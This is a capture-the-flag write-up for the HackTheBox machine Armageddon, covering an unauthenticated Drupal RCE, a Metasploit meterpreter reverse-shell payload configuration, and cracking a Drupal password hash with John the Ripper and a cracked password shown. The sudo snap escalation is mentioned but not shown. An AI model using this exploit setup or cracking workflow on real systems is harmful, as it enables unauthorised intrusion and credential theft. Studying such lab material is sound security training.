Armageddon was an easy Linux machine by bertolis on HTB. The initial foothold came from finding a Drupal instance; enumerating it further reveals the version, which has an unauthenticated RCE that we use to get a shell. Privilege escalation was exploiting sudo snap with GTFOBins to get root.
   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DUMP_OUTPUT  false            no        Dump payload command output
   PHP_FUNC     passthru         yes       PHP function to execute
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       10.10.10.233     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Path to Drupal install
   VHOST                         no        HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tun0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
$ john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (Drupal7, $S$ [SHA512 128/128 SSE2 2x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
booboo           (?)
1g 0:00:00:01 DONE (2021-03-28 10:50) 0.6711g/s 155.7p/s 155.7c/s 155.7C/s tiffany..harley
Use the "--show" option to display all of the cracked passwords reliably
Session completed